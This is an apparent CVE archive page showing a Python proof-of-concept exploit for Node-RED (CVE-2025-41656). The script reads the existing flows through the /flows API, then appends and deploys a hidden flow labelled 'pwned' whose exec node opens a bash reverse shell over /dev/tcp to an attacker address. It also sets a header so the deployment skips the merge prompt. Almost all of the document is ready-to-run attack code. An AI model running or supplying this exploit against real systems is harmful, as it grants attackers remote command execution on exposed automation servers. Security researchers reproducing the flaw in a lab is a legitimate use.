4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve_2025_41656.py PY
import requests
import json
import time

# Replace this with your lab Node-RED IP
NODE_RED_IP = "192.168.4.233"
NODE_RED_PORT = "1880"
NODE_RED_URL = f"http://{NODE_RED_IP}:{NODE_RED_PORT}/flows"

# Construct reverse shell flow
new_flow = [
    {
        "id": "inject1",
        "type": "inject",
        "z": "flow1",
        "name": "Trigger Exec",
        "props": [{"p": "payload"}],
        "repeat": "",
        "crontab": "",
        "once": True,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 120,
        "y": 100,
        "wires": [["exec1"]]
    },
    {
        "id": "exec1",
        "type": "exec",
        "z": "flow1",
        "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", # Change IP here to local host.
        "addpay": False,
        "append": "",
        "useSpawn": "false",
        "timer": "",
        "oldrc": False,
        "name": "Run ID",
        "x": 300,
        "y": 100,
        "wires": [[],[],[]]
    }, 
    {
        "id": "flow1",
        "type": "tab",
        "label": "pwned",
        "disabled": False,
        "info": ""
    }
]

# Construct headers to bypass merge popup
headers = {
    "Content-Type": "application/json",
    "Node-RED-Deployment-Type": "full"
}

# Pull existing flows and send, append, and execute malicious flow in the background
try:
    print("[*] Fetching existing flows...")
    response = requests.get(NODE_RED_URL, headers=headers)
    
    if response.status_code == 200:
        existing_flows = response.json()
        print("[+] Existing flows retrieved successfully.")
    else:
        print(f"[-] Failed to retrieve flows. Status: {response.status_code} | Body: {response.text}")
        existing_flows = []

    print("[*] Appending new flow...")
    timestamp = str(int(time.time()))
    new_flow_id = f"flow1_{timestamp}"
    
    existing_ids = [node.get("id") for node in existing_flows]
    if new_flow_id in existing_ids:
        print(f"[-] Flow ID {new_flow_id} already exists. Aborting to avoid conflicts.")
        raise ValueError("Flow ID conflict detected.")

    for node in new_flow:
        if node.get("z") == "flow1":
            node["z"] = new_flow_id
        if node.get("id") == "flow1":
            node["id"] = new_flow_id

    existing_flows.extend(new_flow)

    print("[*] Deploying reverse shell flow...")
    response = requests.post(NODE_RED_URL, data=json.dumps(existing_flows), headers=headers)
    
    if response.status_code == 204:
        print("[+] Flow appended and deployed successfully in the background.")
    else:
        print(f"[-] Failed to deploy flows. Status: {response.status_code} | Body: {response.text}")

except Exception as e:
    print(f"[!] Error occurred: {e}")